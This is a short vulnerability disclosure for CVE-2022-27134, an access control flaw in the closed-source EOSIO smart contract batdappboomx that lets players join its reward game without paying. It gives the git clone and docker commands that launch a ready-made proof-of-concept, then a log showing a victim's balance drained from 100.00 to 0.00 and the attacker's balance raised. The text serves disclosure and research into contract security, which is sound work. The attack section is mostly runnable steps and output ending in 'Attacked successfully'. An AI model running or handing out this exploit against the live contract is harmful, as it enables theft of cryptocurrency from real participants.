CVE-2022-27134
batdappboomx is a public smart contract running in the EOSIO blockchain. This smart contract rewards cryptocurrency to its participants if they pay some cryptocurrency before.
The latest version of this smart contract. The sha256 hash code of the smart contract is 1327c04cf4b56183eddb1a897bbebf5a873d3421272b708829a4ed0765bef820 Check it at the blockchain explorer https://bloks.io/account/batdappboomx.
access control vulnerability
batdappboomx is not open-source, but we found a vulnerability with WASAI. Attackers can join in this game without paying anything.
- activate the environment
git clone https://github.com/Kenun99/CVE-batdappboomx.git && cd CVE-batdappboomx
docker build -t localhost/client-eos:eos .
docker run --rm --network host -it localhost/client-eos:eos- attack the victim and steal its cryptocurrency, i.e.,
EOS
info 2022-03-11T14:28:53.345 keosd wallet_plugin.cpp:38 plugin_initialize ]
...
warn 2022-03-11T14:28:53.355 keosd wallet.cpp:218 save_wallet_file ] saving wallet to file /root/eosio-wallet/./default.wallet
Creating wallet: default
Save password to use in the future to unlock this wallet.
Without password imported keys will not be retrievable.
saving password to /root/passwd
imported private key for: EOS6MRyAjQq8ud7hVNYcfnVPJqcVpscN5So8BhtHuGYqET5GDW5CV
[+] victim's balance: 100.00 -> 0.00
[+] attacker's balance: 10000000.00 10000100.00
[+] Attacked successfully. Got more cryptocurrency.